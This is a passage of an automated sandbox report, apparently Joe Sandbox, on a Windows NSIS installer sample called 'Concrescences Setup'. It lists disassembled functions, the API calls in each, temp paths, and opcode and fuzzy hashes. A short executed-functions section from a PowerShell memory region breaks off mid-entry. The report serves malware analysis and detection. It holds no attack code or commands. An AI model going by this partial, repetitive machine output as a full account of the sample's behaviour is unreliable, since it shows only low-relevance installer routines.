                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 1356686001-3559984709
                                      • Opcode ID: 1dca66d2d1093a5130de9b07e79a19b0c80f7b3ba9a11136c7381f0e18dd9290
                                      • Instruction ID: 26fcae0a7b2a502e926faea7c6e927eea7b3aae3134fdb689c9e3a18d41500d2
                                      • Opcode Fuzzy Hash: 1dca66d2d1093a5130de9b07e79a19b0c80f7b3ba9a11136c7381f0e18dd9290
                                      • Instruction Fuzzy Hash: 3E1145B1E00108BFEB10AFA5EE89EAF767DEB54358F10403AF505B71D1D6B85D419B28
                                      Function 00402A7A Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A9B
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AD7
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AE0
                                      • RegCloseKey.ADVAPI32(?), ref: 00402B05
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B23
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Close$DeleteEnumOpen
                                      • String ID:
                                      • API String ID: 1912718029-0
                                      • Opcode ID: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
                                      • Instruction ID: feb6aed171ad8b85e204e5b4e2feb4536d295dbd67c3687bd8867431d3a466b7
                                      • Opcode Fuzzy Hash: 26d703e6b955c0b1753e13e50ef068aceb5afa025d50a3e8e2eadb28cc0acf60
                                      • Instruction Fuzzy Hash: 53117F71A00108FFDF229F90DE89EAE3B7DEB54349B104076FA01B10A0D7749E51DB69
                                      Function 00401CDE Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?), ref: 00401CE2
                                      • GetClientRect.USER32(00000000,?), ref: 00401CEF
                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D10
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D1E
                                      • DeleteObject.GDI32(00000000), ref: 00401D2D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 17232caade98c5884c3b98c25dda3274542a73d841a3bd6b31c87e9b59191b88
                                      • Instruction ID: 14b9f5ff68e8b0ed0f2204d74c17d06140583eb6ed2bbf798243b331d3a4cd3b
                                      • Opcode Fuzzy Hash: 17232caade98c5884c3b98c25dda3274542a73d841a3bd6b31c87e9b59191b88
                                      • Instruction Fuzzy Hash: A9F0E7B2A04114AFEB01ABE4DE88DAFB7BDEB54305B10447AF602F6191C7789D018B79
                                      Function 0040393E Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowTextA.USER32(00000000,00422F00), ref: 004039D6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$1033$Concrescences Setup: Completed
                                      • API String ID: 530164218-3068180551
                                      • Opcode ID: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
                                      • Instruction ID: 79edc1b1becbb318b5d11430581b7fe373163fbdb48c995140def98ab9010f1e
                                      • Opcode Fuzzy Hash: 486f1793fc8ee117fab60480f2aa26aac85a5ca9132015367b3694c6ae5d67fc
                                      • Instruction Fuzzy Hash: B311F3F1B04611ABCB20DF14DD809737BADEBC4756328823FE941A73A0C67D9D029B98
                                      Function 00405859 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06
                                        • Part of subcall function 00405804: CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,?,00405870,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405812
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 00405817
                                        • Part of subcall function 00405804: CharNextA.USER32(00000000), ref: 0040582B
                                      • lstrlenA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 004058AC
                                      • GetFileAttributesA.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 004058BC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 3248276644-386598902
                                      • Opcode ID: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
                                      • Instruction ID: 1d2993da53655c0900dfa7f8eb6ffa86a16769ab8224128061af08a25d69d353
                                      • Opcode Fuzzy Hash: 2f5f7bd10b83e5c994280ddce28bb3e0edcf250d71028fabecdb2709bf5dd46b
                                      • Instruction Fuzzy Hash: 16F0F427105E5165DA22323B1C05B9F1A44CD86354718C53BFC51F22D2DA3CC8629DBE
                                      Function 0040576B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\,004030C6,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 00405771
                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user~1\AppData\Local\Temp\,004030C6,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,004032C9), ref: 0040577A
                                      • lstrcatA.KERNEL32(?,00409014), ref: 0040578B
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040576B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                      • API String ID: 2659869361-2382934351
                                      • Opcode ID: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                      • Instruction ID: 00e6a1abdfef3fccf4d12e3b382aa79108487555f8088e95eeaee7bf5793dfbe
                                      • Opcode Fuzzy Hash: 39623dee3265ed167cf4eb0d952b1efefe5673d98ca6e2622bb109ae9f6b3ea7
                                      • Instruction Fuzzy Hash: 94D0A9B2A05A307AD3122715AC0DE8B2A08CF82300B094023F200B72A2CB3C1D418BFE
                                      Function 00405804 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                      Download Yara Rule
                                      APIs
                                      • CharNextA.USER32(?,?,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,?,00405870,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\,00000000), ref: 00405812
                                      • CharNextA.USER32(00000000), ref: 00405817
                                      • CharNextA.USER32(00000000), ref: 0040582B
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp, xrefs: 00405805
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 3213498283-3559984709
                                      • Opcode ID: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                      • Instruction ID: 4ca260c7e1a22d06af12069221c3406c2bee361732d71c1e98a9e22686a99acb
                                      • Opcode Fuzzy Hash: b52e97735ebcacdda31b679af32a6ceda5c9d10ed76b2852ac30fc4ce6ba53e1
                                      • Instruction Fuzzy Hash: 71F0C253908F942BFB3276641C44B675F88DB55350F04C07BEA80B62C2C6788860CBEA
                                      Function 00402C02 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                      Download Yara Rule
                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,00402DE2,00000001), ref: 00402C15
                                      • GetTickCount.KERNEL32 ref: 00402C33
                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B7F,00000000), ref: 00402C50
                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C5E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
                                      • Instruction ID: 69bd14cd8f1a0d496662edafeb8c2727d8675a530a128bc1770b64b88ff4c26b
                                      • Opcode Fuzzy Hash: bb4189f2555980a5a403f1716edff6096ea92162ad211e01232e213a33bdd725
                                      • Instruction Fuzzy Hash: 2CF05E7090A220ABD6217F64FE0CDDF7BA4FB41B527018576F144B21E4C379988ACB9D
                                      Function 00404E86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • IsWindowVisible.USER32(?), ref: 00404EB5
                                      • CallWindowProcA.USER32(?,?,?,?), ref: 00404F06
                                        • Part of subcall function 00403F2A: SendMessageA.USER32(00010466,00000000,00000000,00000000), ref: 00403F3C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Window$CallMessageProcSendVisible
                                      • String ID:
                                      • API String ID: 3748168415-3916222277
                                      • Opcode ID: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
                                      • Instruction ID: f49a9e3fcece2dd6490d1841f3d0f5b5163df4d3f93a23d44cf999a9bd086e10
                                      • Opcode Fuzzy Hash: d7dba211b113031370aa0d375adf93c2d3682e4ecf800ebd227cab9ba7078c69
                                      • Instruction Fuzzy Hash: D10171B110020EABDF209F11DC84A9B3725FBC4754F208037FB11761D1DB799C61A7A9
                                      Function 004035E4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • FreeLibrary.KERNEL32(?,771B3410,00000000,C:\Users\user~1\AppData\Local\Temp\,004035BC,004033D6,?), ref: 004035FE
                                      • GlobalFree.KERNEL32(?), ref: 00403605
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 004035E4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\
                                      • API String ID: 1100898210-2382934351
                                      • Opcode ID: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
                                      • Instruction ID: f6c6d059f9b75f5cc6a79e0049e3afa1176d7e4558308c53008dbe788c85df41
                                      • Opcode Fuzzy Hash: a52acb0b260d536fd7618f3e20de318eec4c6c539c6bb2def64801f0e67eaa78
                                      • Instruction Fuzzy Hash: 3EE0C2338100206BC7211F0AED04B5E77AC6F48B22F054066FC407B3A08B742C418BCC
                                      Function 004057B2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\anziOUzZJs.exe,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 004057B8
                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CD2,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\anziOUzZJs.exe,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 004057C6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-3976562730
                                      • Opcode ID: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                      • Instruction ID: 15550f116ff3ce815c4487a542d9ae56249738f0e4d38f85a76656e2d55d0e49
                                      • Opcode Fuzzy Hash: cad1fee570528055bb4f840757e41c2b2d093a40416f1971c342fc3ba500c074
                                      • Instruction Fuzzy Hash: FAD0C7B2409D705EF31353149C08B9F6A58DF16700F195463E141EB591C6785D415BBD
                                      Function 004058D1 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004058E1
                                      • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004058F9
                                      • CharNextA.USER32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040590A
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00405B2E,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405913
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                      • Instruction ID: 481a9c588bbd1c68550dea5b76d7ebd72626077616c8f786d6c844a28ee3c139
                                      • Opcode Fuzzy Hash: d250403eeccc32afa1460bd507a63d74f6ad2c43926490d4129708a4008c1f50
                                      • Instruction Fuzzy Hash: 9EF0F632504418FFCB02AFA5DC0099EBBA8EF46360B2540B9F800F7310D274EF01ABA9

                                      Executed Functions

                                      Function 0720BC18 Relevance: 8.0, Strings: 5, Instructions: 1706COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q$4'q
                                      • API String ID: 0-3272727544
                                      • Opcode ID: 6db3b085bc0ed8b7d4c7f84cf7a8a1e77bd01a6866f1b13e94b7f3f20c099b57
                                      • Instruction ID: 4b43ede1552a945373b8f315723f0079bf05f2b4f2c9c840512e79f0f3d5f28b
                                      • Opcode Fuzzy Hash: 6db3b085bc0ed8b7d4c7f84cf7a8a1e77bd01a6866f1b13e94b7f3f20c099b57
                                      • Instruction Fuzzy Hash: 79F24EB5A10315DFE724DB64C950BEEB7B2EB89304F5080A9D4096B391CB76ED81CFA1
                                      Function 02C9EFF8 Relevance: .3, Instructions: 281COMMON
                                      Download Yara Rule
                                      Memory Dump Source
